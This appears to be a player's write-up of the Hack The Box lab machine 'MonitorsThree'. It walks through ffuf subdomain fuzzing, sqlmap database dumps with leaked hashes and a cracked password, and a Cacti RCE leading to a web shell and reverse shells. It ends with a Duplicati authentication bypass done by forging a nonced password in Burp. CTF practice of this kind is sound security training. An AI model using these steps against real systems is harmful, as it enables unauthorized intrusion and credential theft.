monitorsthree

#

User

#

sudo bash -c "echo '10.10.11.30    monitorsthree.htb'>> /etc/hosts"

Can’t see anything of interest off the bat lets do some enumeration

ffuf -u http://monitorsthree.htb -H "Host:FUZZ.monitorsthree.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -c -ac

Found the app login section

The password recovery section was vulnerable to sql injection

sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --dbs

sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db --tables

sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db -T users -columns

sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db -T users -C username,password --dump

Database: monitorsthree_db
Table: users
[4 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin     | 31a181c8372e3afc59dab863430610e8 |
| dthompson | 633b683cc128fe244b00f176c8a950f5 |
| mwatson   | c585d01f2eb3e6e1073e92023088a3dd |
+-----------+----------------------------------+

admin : greencacti2001

my creds for admin worked on both monitorsthree and the subdomain cacti . monitorsthree

I saw that cacti was running 1.2.26 and found a rce for it

I uploaded a p0wny-shell shell and tried out revshells until one got me a connection

I found a db file that had credentials for mysql

mysql -ucactiuser -pcactiuser -e "USE cacti;" -e "Select * from user_auth;"

I remeber the terminal being buggy so i just used the webshell

1	admin	$2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G	0	Administrator	marcus@monitorsthree.htb			on	on	on	on	2	1	1	1	1	on	-1	-1	-1		0	0	436423766
3	guest	$2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu	0	Guest Account	guest@monitorsthree.htb			on	on	on		1	1	1	1	1		-1	-1	-1		0	0	3774379591
4	marcus	$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK	0	Marcus	marcus@monitorsthree.htb		on	on	on	on	on	1	1	1	1	1	on	-1	-1			0	0	1677427318

hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/rockyou.txt hash.txt -show

marcus : 12345678910

Couldnt ssh into marcus

Couldnt su in the webshell either so got the terminal again and got the ssh key and then used that to ssh in

Root

#

netstat -tnlp

ssh -i id_rsa marcus@10.10.11.30 -L 127.0.0.1:8080:127.0.0.1:8080

Found a way to bypass the authentication

First step was finding the duplicati server config

Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=

Next convert server passphrase from base64 to hex

59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

turn on intercept on burp and then right click and hit “do intercept” “response to this request”

hit forward

make sure you mark down this nonce (this will be diffrent for everyone)

wqCENkgcvVIlDPe9Q3HpaNhz+YXmYk8FNLoOQfIzCEM=

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);

our hex is the 59be string and our ’noncefromburp’ is our wqCE

j65vMghwC8l+b+RjSm2VvMNsA43fKKsf/jnqDW5FfTo=

back on burp hit forward again

we need to replace this 1ak variable with our ‘j65vM’ fully nonced string

then we need to url encode it higlight it in burp and hit ctrl + u

now were ready send it on

we can turn intercept off and just focus on our browser now

What i did here was utilise the back up restoring software to restore the root.txt to marcus’s folder